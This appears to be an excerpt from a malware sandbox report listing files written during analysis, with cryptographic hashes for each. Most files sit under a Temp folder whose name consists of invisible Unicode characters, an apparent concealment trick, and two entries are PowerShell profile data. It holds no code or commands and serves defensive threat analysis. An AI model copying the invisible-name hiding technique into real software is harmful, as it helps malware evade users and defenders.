SHA512 91f376794d8d76b96c6ad0a240cddc5e45bb4fed167223eb0b407f5e24fd270da0a584ab6d4039c673f41ca75e4bffbabda0120987ae39d0103644618dafa458

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Music\DisableMount.mp4

MD5 d0929c6508334d92ed0e3152bb59776a
SHA1 1eaf58545544791d408b58a57041c077e8f7c77d
SHA256 3040959906c8b28d9b7ef47684ed71ba8ef9d9e435e543a0acbc64bedf59d9c2
SHA512 aff8d100fc54d10e928a7a0716e9e9dc9e7a43f84314c6fa3d9bc14a0420c5627ab94523a282d6db063ac05eab6397109032cceb6b676946590b092f794a1b26

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Music\NewResize.jpg

MD5 eb53dfca6b13456bb12d38d3615a8ed2
SHA1 8e39efdd6c4dab9ea54f10073dfcac3b75be5915
SHA256 248e12cf25600068ade8f29abc025f54462037ca6bdd5d124c85d8f5727a49b0
SHA512 a90995725577382ce93f307a3d584d2c8849200572d3801f8712c1cbaab15a2b20b74b646088a50fd1155fea8910a8c0aac0a163e9a33f2d66cf3f9087d76dce

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Music\ProtectCheckpoint.mp4

MD5 d74338f91d0651074d1bc2c5b2d53aba
SHA1 a0a6f4630794e2c5713559c01f65d96713be4b99
SHA256 38ced87980821ebda79150ebe0493b6487aeb4714f2645090034de05f7f9e57b
SHA512 1607c8b191de3efd53638ba056187761c8d9f32db66c32b5c752d094d2b30be7510b4996c8fcedfe4c68c1e2ee210461e448fcfb515545b2a10bf2d5b082e6a3

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Music\RestoreDisable.mp4

MD5 ef1bf503c259c8d0e849c3b045eb2442
SHA1 ee9f46991462bcee01debec4e8f17629eda25f96
SHA256 da8220e654de88e11d69c739b2d85d8666b275e5d8c51626fc15cd89e6715607
SHA512 a4ff28b2528b234a4ce111b4a08c075cc7fec36d96660149320506f03befb71444b68a5a961c083cbf00cf6a88265f4761d1bc05ed199a2cad44a6278a60a786

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Pictures\JoinLimit.png

MD5 f66bff7c5039ed0f4ed01f73fcd50950
SHA1 fb2428032374041055b0f4cde87f7ab6aee23def
SHA256 9e795d9f7e6e85b67e98a1e9f82d14c9c5de26abdc8bfa633416b9e198114953
SHA512 83c8a428fc84b7fd751e49f20dc1a6ce042e9d8e69bb574c0c18476fde5d593acae4ed9f73d0d8e3ef7e4537151b2a05108215a9da6905053dc265ee18fd8252

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Pictures\MoveBackup.dwg

MD5 878c8ad3561fd38978385f93f7b51c8e
SHA1 c7e2f23a7c59f5c197fffc14204b563555c1089a
SHA256 35193e09f65c1d30f97ff3d36e90f2cbe7bd9b063378bd0d4413aad39b4332c9
SHA512 9ed9ff227b6f377a78f774b3ff8fc624e5bb74d7d9cfc71f9fb997a3ac9151b1fccb3277265258a9fc8fd38cb20a78c1fa589d6f0e802b69ecda3dec3715fd1c

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Pictures\ExportHide.png

MD5 7b0960314b85ab5e1fdb5432170f9a60
SHA1 44d55fc17ec7f99f0aca242fb71b9fd695814ca1
SHA256 e08f6e04ae681320cb7af47c7f18e327b9a81ad56626b7f33e6bd1d2ef0a5c26
SHA512 5dd140618cce78406afb0a2949ed9e9658e4d48cc29a0308a846c086a5171320f31484456327ccc363ec40142db33e6603fe4962cfbd642263796cfb1210b040

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b2f8b5bf54e10ae4d93a2eac002cb497
SHA1 eccc3cd33596075bf413e4249c1f2491b1b2a6c7
SHA256 44e6afcd4b56b7cbc81c4ce55e62b7ae6f8d44948f2b9cc9a6ee9a9adfdce02d
SHA512 58c5911a9b98b94909e627f498f839a55383aa213afd9a837ed1f8543198a79a856baa02373f948bfbb0cfd149e7962e2356cdad6695dc6411840faa09700686

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ccf1b703c8f1f34a2faf84a676e0ef0c
SHA1 46dc045aa7dcf8938c0352d4125e796d38c4b7a3
SHA256 789e5eaacf5284c772fd75aab4c445eadff4816410167eea41a185ffe35b36fa
SHA512 c53f8516e7e65f86a0cba52ba2a7aa5c9e0bee4285b6cae525a0c1202d04f779a20225a6b8f8e674daf1ab9b4b225b3ebb7cda7588b3ab062761b136eb86b24a